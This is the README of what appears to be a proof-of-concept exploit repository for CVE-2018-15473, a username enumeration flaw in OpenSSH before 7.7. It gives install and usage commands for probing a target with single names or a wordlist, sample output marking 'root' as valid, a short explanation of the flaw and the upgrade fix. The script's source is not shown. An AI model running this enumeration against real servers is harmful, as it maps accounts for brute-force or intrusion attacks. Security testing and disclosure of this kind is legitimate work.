OpenSSH 2.3 < 7.7 - Username Enumeration## CVE-2018-15473
**SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)**
Edited version of the original exploit: https://www.exploit-db.com/exploits/45233
* Converted to Python3
* Added username wordlist option
## How To Run
```bash
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
```
```bash
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
```
```bash
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
```
```bash
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
```
## About the Vulnerability:
The system responds differently to valid and invalid authentication attempts. A remote user can send specially crafted requests to determine valid usernames on the target system. Thus, a remote user can determine valid usernames on the target system.
## Solution:
OpenSSH server should be upgraded to, or higher than, version 7.7
[4.0K] /data/pocs/bcd3d695ae83d63a9616fd2372ac7ae602e3cc91
├── [3.1K] CVE-2018-15473.py
├── [1.1K] README.md
└── [ 18] requirements.txt
0 directories, 3 files